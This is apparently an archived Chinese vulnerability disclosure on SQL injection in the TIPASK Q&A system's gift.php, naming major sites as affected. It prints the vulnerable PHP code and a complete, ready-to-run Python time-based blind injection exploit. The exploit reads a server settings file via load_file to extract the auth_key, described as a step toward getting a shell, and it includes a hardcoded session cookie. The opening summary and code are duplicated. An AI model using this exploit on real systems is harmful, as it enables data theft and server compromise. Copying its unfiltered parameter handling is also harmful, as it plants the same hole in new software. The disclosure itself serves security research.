VULHUB ™

### 简要描述： TIPASK问答系统SQL注入三（影响天极网、戴尔中国、WPS office、小米等网站） ### 详细说明： 部分案例： [<img src="https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg) 通过源代码发现/control/gift.php存在注入，部分代码如下 ``` function onadd() { if(isset($this->post['realname'])) { $realname = $this->post['realname']; $email = $this->post['email']; $phone = $this->post['phone']; $addr = $this->post['addr']; $postcode = $this->post['postcode']; $qq = $this->post['qq']; $notes = $this->post['notes']; $gid = $this->post['gid']; $param = array(); if(''==$realname || ''==$email || ''==$phone||''==$addr||''==$postcode) { $this->message("为了准确联系到您，真实姓名、邮箱、联系地址（邮编）、电话不能为空！",'gift/default'); } if (!preg_match("/^[a-z'0-9]+([._-][a-z'0-9]+)*@([a-z0-9]+([._-][a-z0-9]+))+$/",$email)) { $this->message("邮件地址不合法!",'gift/default'); } if(($this->user['email'] != $email) &&...

### 简要描述： TIPASK问答系统SQL注入三（影响天极网、戴尔中国、WPS office、小米等网站） ### 详细说明： 部分案例： [<img src="https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/131743219ef90cabffb2d717fd9b455e771b7176.jpg) 通过源代码发现/control/gift.php存在注入，部分代码如下 ``` function onadd() { if(isset($this->post['realname'])) { $realname = $this->post['realname']; $email = $this->post['email']; $phone = $this->post['phone']; $addr = $this->post['addr']; $postcode = $this->post['postcode']; $qq = $this->post['qq']; $notes = $this->post['notes']; $gid = $this->post['gid']; $param = array(); if(''==$realname || ''==$email || ''==$phone||''==$addr||''==$postcode) { $this->message("为了准确联系到您，真实姓名、邮箱、联系地址（邮编）、电话不能为空！",'gift/default'); } if (!preg_match("/^[a-z'0-9]+([._-][a-z'0-9]+)*@([a-z0-9]+([._-][a-z0-9]+))+$/",$email)) { $this->message("邮件地址不合法!",'gift/default'); } if(($this->user['email'] != $email) && $this->db->fetch_total('user'," email='$email' ")) { $this->message("此邮件地址已经注册!",'gift/default'); } $gift = $_ENV['gift']->get($gid); if($this->user['credit2']<$gift['credit']) { $this->message("抱歉！您的财富值不足不能兑换该礼品!",'gift/default'); } $_ENV['user']->update_gift($this->user['uid'],$realname,$email,$phone,$qq); $_ENV['gift']->addlog($this->user['uid'],$gid,$this->user['username'],$realname,$this->user['email'],$phone,$addr,$postcode,$gift['title'],$qq,$notes,$gift['credit']); $this->credit($this->user['uid'],0,-$gift['credit']);//扣除财富值 $this->message("礼品兑换申请已经送出等待管理员审核！","gift/default"); } } ``` $gid = $this->post['gid']; $gid参数没有严格的过滤，造成了SQL注入漏洞 同样 为了无限制getshell，依然还是获取加密的auth_key，直接上Exp: ``` #/usr/bin/pytyon import urllib import urllib2 from time import * def inject(url,payload): post = urllib.urlencode({ 'gid':payload, 'realname':'testtest', 'email':'email@qq.com', 'phone':'15800000000', 'addr':'111111', 'postcode':'22222' }) header = {'Cookie':'tp_auth=70349FVn7tDasEWTHDyi6y7itpKIFhjiQ66UaK7mwIB31Rc7E0MttS8v7QfbBy1yGmiHDNptr3sjTC7RyXhM'} req = urllib2.Request(url,post,header) start_time = time() resp = urllib2.urlopen(req) flag = int(time()-start_time) return flag def exploit(): result = "" url = 'http://127.0.0.1/tipask/?gift/add.html' for i in range(4677,4741): for num in range(32,127): flag= inject(url,"2) and if(ord(substring((select/**/load_file(0x443A5C417070536572765C7777775C74697061736B5C646174615C63616368655C73657474696E672E706870)),%s,1))=%s,BENCHMARK(5000000,md5(1)),null)#"%(i,num)) if flag>0: mstr = i - 4676 result = result+chr(num) print 'auth_key =>'+result break if __name__=="__main__": exploit() ``` 结果如下： [<img src="https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg) ### 漏洞证明： 漏洞证明： [<img src="https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/13181653fe33a6322c920b80619e3194142a074b.jpg)